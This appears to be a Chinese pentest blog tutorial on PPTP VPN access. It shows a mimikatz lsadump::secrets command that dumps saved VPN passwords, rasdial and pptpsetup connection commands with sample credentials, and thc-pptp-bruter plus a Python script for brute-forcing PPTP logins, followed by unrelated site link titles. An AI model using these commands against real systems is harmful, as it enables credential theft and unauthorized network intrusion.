0x00 前言

PPTP(即点对点隧道协议)可以使远程用户通过拨入ISP访问企业内网。

在渗透测试中,如果获得了用户的PPTP口令,就能远程拨入内网,做进一步渗透。

本文将要介绍命令行下导出PPTP配置信息和口令的方法,开源PPTP口令爆破的脚本。

0x01 简介

本文将要介绍以下内容:

· Windows系统命令行下PPTP配置信息和口令的获取

·Windows系统命令行开启和关闭VPN连接

·Windows系统连接PPTP的方法和细节

·Kali系统连接PPTP的方法和细节

·PPTP口令爆破的脚本细节

0x02 Windows系统命令行下PPTP配置信息和口令的获取

1、获取PPTP配置信息

Windows系统拨号和宽带连接的配置信息存储在固定位置,路径如下:

%APPDATA%\Microsoft\Network\Connections\Pbk\rasphone.pbk

查看该文件即可获得PPTP连接的配置信息,包括服务器IP,不包含连接用户名和口令

VPN连接的名称为VPN Connection,如下图:

PhoneNumber表示连接的服务器IP,如下图:

2、获得内网IP

ipconfig

获得内网IP,如下图

3、获得PPTP口令

使用工具mimiaktz,命令如下:

mimikatz.exe privilege::debug token::elevate lsadump::secrets exit

获得连接用户名和口令,如下图:

4、命令行下连接VPN

rasdial "VPN Connection" zhaodg oZ7iFk25

如下图:

5、命令行关闭VPN连接

rasphone -h "VPN Connection"

0x03 Windows系统PPTP连接的方法和细节

1.如下图所示:

2.如下图所示:

3.如下图所示:

4.选择创建新连接

5.填入服务器IP,选中稍后连接

6.填入用户名口令

7.点击连接后,选择跳过

接下来修改VPN属性,Security->Type of VPN,选择Point to Point Tunneling Protocol(PPTP)

注:创建成功后,指定Point to Point Tunneling Protocol(PPTP)可缩短连接等待的时间

8.连接

0x04 Kali系统PPTP连接的方法和细节

方法1:通过界面

1.安装

apt-get install network-manager-pptp network-manager-pptp-gnome

2.Settings->Network->VPN

3.Identity->Advanced…

去掉PAP,CHAP,EAP

选择Use Point-to-Point encryption(MPPE)

注:如果无法连接,修改文件/etc/NetworkManager/NetworkManager.conf

managed=false修改成managed=true

重启系统

方法2:通过pptpsetup

1.连接

pptpsetup --create vpn --server 5x.xxx.xxx.xx2 --username zhaodg --password oZ7iFk25 --encrypt --start

远程IP为192.168.0.1,如下图

2.修改路由表

将默认路由表修改为远程IP

route del default

route add default gw 192.168.0.1

0x05 PPTP口令爆破

PPTP服务器默认开放1723端口

1、PPTP brute forcer

源代码:

kali默认支持

通过字典爆破的命令如下:

cat wordlist | thc-pptp-bruter -u zhaodg

如下图

注:PPTP搭建于centos

2、编写python脚本实现

有些设备的PPTP无法使用PPTP brute forcer进行爆破

于是尝试使用python调用pptpsetup实现

通过os.popen执行命令,测试代码如下:

import os

def test_vpn(ip,name,password):

command = 'pptpsetup --create testvpn --server '+ip+' --username '+name+' --password '+password+' --encrypt --start'

print command

vpn_status = os.popen(command).read()

print vpn_status

if __name__ == '__main__':

test_vpn('5x.xxx.xxx.xx2','zhaodg','oZ7iFk25')

测试过程中出现bug:

如果登录成功,进程pptp不会退出,导致脚本阻塞,无法获得回显。

只有结束进程pptp后,才能获得回显。

所以这里需要使用子进程的方式实现:子进程执行pptpsetup命令,父进程不等待。

随之产生新的问题:如何获得子进程的结果,判断是否登录成功。

这里选择一个简单直接的方法:等待10秒,然后执行ifconfig,如果登录成功,会产生新的网卡设备ppp0,否则,当前用户名口令错误。

登录成功后,选择清理进程,执行命令:

pkill pptp

清除连接信息:

pptpsetup --delete testvpn

完整代码可参考:

代码会读取文件wordlist,获得口令字典,对指定IP尝试连接,连接成功后记录口令,清除进程和连接

测试如下图:

0x06 小结

本文介绍了命令行下导出PPTP配置信息和口令的方法,通过命令行能够实现开启和关闭VPN连接。

python pptp链接_渗透技巧——PPTP口令的获取与爆破相关推荐

  1. c++ 服务 以当前用户拉起进程_渗透技巧——通过CredSSP导出用户的明文口令

    0x00 前言 在渗透测试中,为了获得Windows系统中的用户口令,通常会选择读取lsass进程的内存.这种方法不仅需要获得系统的管理员权限,而且在更多情况下需要绕过系统对lsass进程的保护. 我 ...

  2. python pptp模块_[原]解决PPTP中Module ppp_mppe not found的问题

    正如前面提到的,pptpsetup脚本在运行时会检查核心是否支持MPPE模块,以及PPP是否支持MPPE加密.若不满足条件,会报类似: 引用 FATAL: Module ppp_mppe not fo ...

  3. 读取pcap获得端口_渗透技巧——获得Exchange GlobalAddressList的方法

    0x00 前言 Exchange GlobalAddressList(全局地址列表)包含Exchange组织中所有邮箱用户的邮件地址,只要获得Exchange组织内任一邮箱用户的凭据,就能够通过Glo ...

  4. ssrf漏洞内网渗透_渗透技巧之SSRF

    SSRF--服务端请求伪造,上一篇,我谈到了CSRF客户端请求伪造,这个是我们通过攻击用户,引诱客户点击我们伪造好的表单,从而达到我们攻击的目的,是从客户端发起的,那么SSRF服务端请求伪造当然是通过 ...

  5. python自我介绍_面试技巧:一分钟自我介绍怎么说才精彩

    任何公司面试中都有一段短短的自我介绍,其实是为了更深进一步的面谈而设置的.一分钟的自我介绍需要将自己最美好的一面在招聘方面前毫无保留地表现出来,想要知道怎么才能给对方留下好的印象,一起来看看小编为你带 ...

  6. python提权_渗透利器 | 提权辅助工具箱

    作为技术宅的我,日常最大的爱好就是逛论坛.某日看到论坛里有一款基于主机的漏洞扫描工具,用来查找主机上公开EXP的CVE.嗯嗯,我想还是叫提权辅助工具可能会更顺口一些.在我印象中,类似的工具其实还蛮多的 ...

  7. python批量爬取小网格区域坐标系_Python爬虫实例_利用百度地图API批量获取城市所有的POI点...

    上篇关于爬虫的文章,我们讲解了如何运用Python的requests及BeautifuiSoup模块来完成静态网页的爬取,总结过程,网页爬虫本质就两步: 1.设置请求参数(url,headers,co ...

  8. python 加速运行_实践经验|Python加速运行技巧

    本文转载自[微信公众号:机器学习算法与Python精研 ,ID:AITop100],经微信公众号授权转载,如需转载原文作者联系 作者张皓:南京大学计算机系机器学习与数据挖掘所(LAMDA)硕士,腾讯优 ...

  9. python3实用编程技巧_适合Python初学者的一些编程技巧

    这篇文章主要介绍了给Python初学者的一些编程技巧,皆是基于基础的一些编程习惯建议,需要的朋友可以参考下 交换变量 x = 6 y = 5 x, y = y, x print x >>& ...

最新文章

  1. flash开发中如何实现界面代码分离
  2. python 面向对象的篮球技巧训练实现
  3. python dialect='excel'是什么意思_python读取和生成excel文件
  4. 写一个高性能的敏感词检测组件
  5. Mysql -uroot -p 登陆不上_mysql的登陆和退出命令格式
  6. 有趣的圣诞节 库的打包
  7. 无人驾驶(大安全概念)
  8. 深入理解基本包装类型
  9. 数据结构实践——用哈希法组织关键字
  10. 【C++】在控制台上跳极乐净土-easyX简单音乐及动画
  11. win10计算机怎么拨号上网,Win10怎么设置自动连接宽带_Win10怎么设置自动拨号连接上网-192路由网...
  12. 51单片机两只老虎 c语言,基于51单片机的简易电子琴(两只老虎)
  13. ipa文件上架app store的方法,很简单
  14. Unity-黑暗之魂复刻-角色摄相机
  15. 输入圆的的半径r 和一个整型数k,当k=1 时,计算圆的面积;当k=2 时,计算圆的周长;当k = 3 时,既要求求圆的周长也要求出圆的面积
  16. 优秀的项目跟踪管理软件有哪些?
  17. 1. Java并发编程-Java内存模型
  18. JZOJ-senior-5935. 【NOIP2018模拟10.29】小凯学数学
  19. 感觉黑客帝国的时代不远了
  20. xsl空格等特殊符号转换

热门文章

  1. “九”答不可 | 量子保密,完美无缺?
  2. Linux(lamp安装)
  3. RxJava初入学习(一)之Gifts-for-designers
  4. ajax对服务器路径请求
  5. Android隐藏状态栏和标题栏,相当于全屏效果
  6. ZedGraph在项目中的应用
  7. ***产业链 安全新忧患
  8. 某程序员总结大厂程序员性格:阿里出来的是人精!百度出来的脾气好!美图出来的一根筋!头条出来的心高气傲!京东出来的满嘴是兄弟!...
  9. RocketMQ 一行代码造成大量消息丢失
  10. Kafka:消息是如何在服务端存储与读取的,你真的知道吗?